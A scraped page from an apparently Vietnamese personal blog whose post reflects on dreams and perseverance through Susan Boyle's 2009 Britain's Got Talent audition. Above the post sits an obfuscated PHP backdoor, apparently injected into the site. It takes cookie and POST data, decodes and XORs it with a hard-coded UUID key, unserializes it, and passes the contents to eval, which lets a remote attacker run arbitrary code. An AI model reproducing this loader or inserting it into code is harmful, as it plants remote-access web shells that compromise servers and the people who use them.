$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> I Dreamed a Dream – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

I Dreamed a Dream

Các bạn đang có những ước mơ, anh biết là thế. Vì ở tuổi này, ai mà chả có vô vàn những ước mơ.

Các bạn hẳn đã từng nói câu: “Chẳng thằng rỗi hơi nào đi đánh thuế giấc mơ, phỏng ạ!” để rồi mặc sức vẽ trong đầu các bạn những bức tranh với màu sắc và hình thù mà ngoài các bạn, chẳng ai biết. Nhưng câu hỏi ở đây là: có ai dám sống mãi với ước mơ của mình, và làm hết sức để biến ước mơ thành hiện thực. Hay là khi gặp khó khăn nào đó, các bạn buông xuôi và lại vẽ ra một bức tranh mang màu ước mơ khác, với câu nói như ở đầu đoạn này anh đã nhắc.

Anh 22 tuổi. Anh đã và đang có vài ước mơ. Trong số đó có một giấc mơ, mà anh biết, chỉ buông tay ra là nó sẽ bay đi mãi mãi, sẽ tan vào hư vô, cuốn đi theo một phần kí ức tươi đẹp của một thời trai trẻ là anh ấy. Hiện anh vẫn giữ chặt nó. Anh chỉ không biết, liệu anh có dám sống mãi với nó không. Bản thân con người rất yếu ớt, anh tuy có nhiều phẩm cách và đức tính vượt trội, nhưng vẫn là con người. Tộ sư nó, thế có chết không chứ?

Hôm nay, anh xem cái clip này:

Susan Boyle – Britains Got Talent 2009 ((Bài này có trong vở nhạc kịch Les Misérables – Những người khốn khổ link wiki: http://en.wikipedia.org/wiki/Songs_from_Les_Mis%C3%A9rables))

anh thật sự khâm phục cô ấy.

Ở đây, anh không nói về tài năng hay giọng hát, không phải vì giọng của cô ấy không hay, mà là thiết tưởng chẳng cần bàn tới ở đây.

Khi bạn 47 tuổi, liệu bạn có dám đăng kí tham gia chương trình tìm kiếm tài năng âm nhạc Britain’s Got Talent, đứng trước đám đông và nói

I want to be like Elaine Page.

Khi đấy cả khán phòng khúc khích cười.

Tuy nhiên, khi người phụ nữ ấy hát xong, Piers Morgan, một người trong ban giám khảo đã nói

When you stood there, with that cheeky grin, and said ‘I want to be like Elaine Page’, everyone was laughing at you. No one is laughing now.

Có lẽ, họ cũng như anh, không khâm phục giấc mơ của cô, nhưng khâm phục cái quyết tâm biến ước mơ thành sự thật của cô ấy

Đời người chẳng được bao lâu, dám mơ ước, thì cũng nên dám sống hết mình vì nó. Bạn nhỉ?

B.l.u.e.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.